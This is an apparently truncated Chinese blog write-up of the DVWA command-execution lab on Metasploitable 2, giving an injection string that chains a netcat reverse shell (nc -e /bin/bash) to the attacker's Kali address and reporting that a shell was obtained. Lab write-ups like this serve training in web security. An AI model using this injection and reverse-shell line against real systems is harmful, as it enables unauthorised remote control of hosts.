Command Execution
靶机基本情况
Metasploitable 2中的DVWA
Level: Low
构造语句:
;nc -e /bin/bash 192.168.176.128 5555
其中192.168.176.128为Kali Linux IP 地址
可以成功拿到shell:
┌──(root
标签:bin,www,python,192.168,33,Command,DVWA,Execution,data
From: https://www.cnblogs.com/jason-huawen/p/17010255.html